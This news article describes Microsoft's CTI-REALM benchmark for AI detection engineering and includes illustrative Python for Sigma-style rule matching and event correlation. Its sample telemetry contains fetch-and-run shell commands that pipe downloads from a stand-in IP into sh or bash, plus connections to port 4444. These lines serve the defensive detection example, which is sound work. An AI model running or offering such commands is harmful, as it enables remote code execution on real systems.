Microsoft introduces CTI-REALM, a new standard for evaluating AI in cybersecurity

Technologies | 2026-03-24, 06:44

CTI-REALM is an open-source benchmark designed to assess how well AI agents can perform real-world detection engineering tasks, rather than simply answering theoretical questions.

The benchmark simulates the end-to-end workflow of a SOC analyst:
🔵 reading cyber threat intelligence (CTI) reports;
🔵 analyzing telemetry data;
🔵 writing and refining KQL queries;
🔵 producing validated detection rules (e.g., Sigma).
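To make "validated detection rules" concrete, here is a minimal Python sketch of the write, validate, and refine loop described above. It is not CTI-REALM code: the rule, the field names (`Image`, `CommandLine`), and the labeled events are hypothetical. Only a small subset of Sigma semantics is modeled: one selection block, the `contains`/`startswith`/`endswith` modifiers, case-insensitive matching, AND across fields, and OR across listed values.

```python
from typing import Any

# Hypothetical Sigma-style rule as a Python dict (not taken from CTI-REALM).
# Only one "selection" block is supported; its implied condition is "selection".
RULE: dict[str, Any] = {
    "title": "Download piped to shell (hypothetical example)",
    "selection": {
        "Image|endswith": ["/curl", "/wget"],
        "CommandLine|contains": "| sh",
    },
}

def field_matches(value: str, modifier: str, expected: str) -> bool:
    """Apply one Sigma-style modifier; comparisons are case-insensitive, as in Sigma."""
    value, expected = value.lower(), expected.lower()
    if modifier == "contains":
        return expected in value
    if modifier == "startswith":
        return value.startswith(expected)
    if modifier == "endswith":
        return value.endswith(expected)
    return value == expected  # no modifier: exact (case-insensitive) match

def matches(selection: dict[str, Any], event: dict[str, str]) -> bool:
    """Every field must match (AND); a list of values means any one may match (OR)."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None:
            return False
        options = expected if isinstance(expected, list) else [expected]
        if not any(field_matches(value, modifier, opt) for opt in options):
            return False
    return True

def validate(rule: dict[str, Any], events: list[tuple[dict[str, str], bool]]) -> dict[str, int]:
    """Score a rule against labeled telemetry: true positives, false positives, misses."""
    counts = {"tp": 0, "fp": 0, "fn": 0}
    for event, is_malicious in events:
        hit = matches(rule["selection"], event)
        if hit and is_malicious:
            counts["tp"] += 1
        elif hit:
            counts["fp"] += 1
        elif is_malicious:
            counts["fn"] += 1
    return counts

# Made-up labeled telemetry: (event fields, is_malicious).
EVENTS = [
    ({"Image": "/usr/bin/curl", "CommandLine": "curl -s http://203.0.113.5/a | sh"}, True),
    ({"Image": "/usr/bin/curl", "CommandLine": "curl -O https://example.com/pkg.tar.gz"}, False),
    ({"Image": "/usr/bin/wget", "CommandLine": "wget -qO- http://203.0.113.5/b | bash"}, True),
]

print(validate(RULE, EVENTS))  # → {'tp': 1, 'fp': 0, 'fn': 1}

# Refinement step: widen the CommandLine match and re-validate.
refined = {**RULE, "selection": {**RULE["selection"], "CommandLine|contains": ["| sh", "| bash"]}}
print(validate(refined, EVENTS))  # → {'tp': 2, 'fp': 0, 'fn': 0}
```

The first draft misses the `| bash` variant; widening the match catches it without adding false positives on this toy data. Real detection validation runs against far larger and noisier telemetry.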

❗️ What sets CTI-REALM apart is its focus on practical application: it measures whether AI can translate threat intelligence into validated detections and correctly correlate events across complex infrastructures. The benchmark is built on real-world attack scenarios spanning platforms such as Linux, Azure, and Kubernetes, and it evaluates not only final outcomes but also the decision-making logic at each stage.
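Correlation links several events into one detection instead of alerting on each in isolation. The Python sketch below, again hypothetical and not derived from CTI-REALM, pairs a process execution with an outbound network connection from the same host within a time window. The `Event` fields, the event kinds, and the 60-second window are assumptions chosen for illustration.

```python
from dataclasses import dataclass

@dataclass
class Event:
    host: str
    ts: float     # seconds since epoch (assumed unit)
    kind: str     # hypothetical event types, e.g. "process" or "network"
    detail: str

def correlate(events: list[Event], first_kind: str, second_kind: str,
              window_s: float) -> list[tuple[Event, Event]]:
    """Pair each second_kind event with earlier first_kind events on the same host
    that occurred at most window_s seconds before it."""
    pending: dict[str, list[Event]] = {}
    pairs: list[tuple[Event, Event]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == first_kind:
            pending.setdefault(ev.host, []).append(ev)
        elif ev.kind == second_kind:
            # Drop first-stage events that have fallen out of the time window.
            live = [f for f in pending.get(ev.host, []) if ev.ts - f.ts <= window_s]
            pending[ev.host] = live
            pairs.extend((f, ev) for f in live)
    return pairs

events = [
    Event("node-1", 100.0, "process", "curl -s http://203.0.113.5/a | sh"),
    Event("node-1", 130.0, "network", "203.0.113.5:4444"),
    Event("node-2", 105.0, "network", "198.51.100.7:443"),
    Event("node-1", 400.0, "network", "203.0.113.5:4444"),
]

for first, second in correlate(events, "process", "network", window_s=60):
    print(first.host, first.detail, "->", second.detail)
```

Only the node-1 pair 30 seconds apart is reported: the later node-1 connection falls outside the window, and the node-2 connection has no preceding process event.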

The results show that even advanced models still perform inconsistently on detection tasks, especially in complex scenarios that require deep contextual understanding and multi-step correlation.

For attackers, this points to a gradually shrinking window of opportunity across the attack lifecycle. As detection becomes more automated, blue teams respond faster and staying stealthy becomes harder, particularly with common techniques. At the same time, weaknesses in AI decision logic form a new attack surface that adversaries may attempt to exploit.


Vendors: Microsoft

Products: Azure, CTI-REALM, KQL, Kubernetes, Linux, Sigma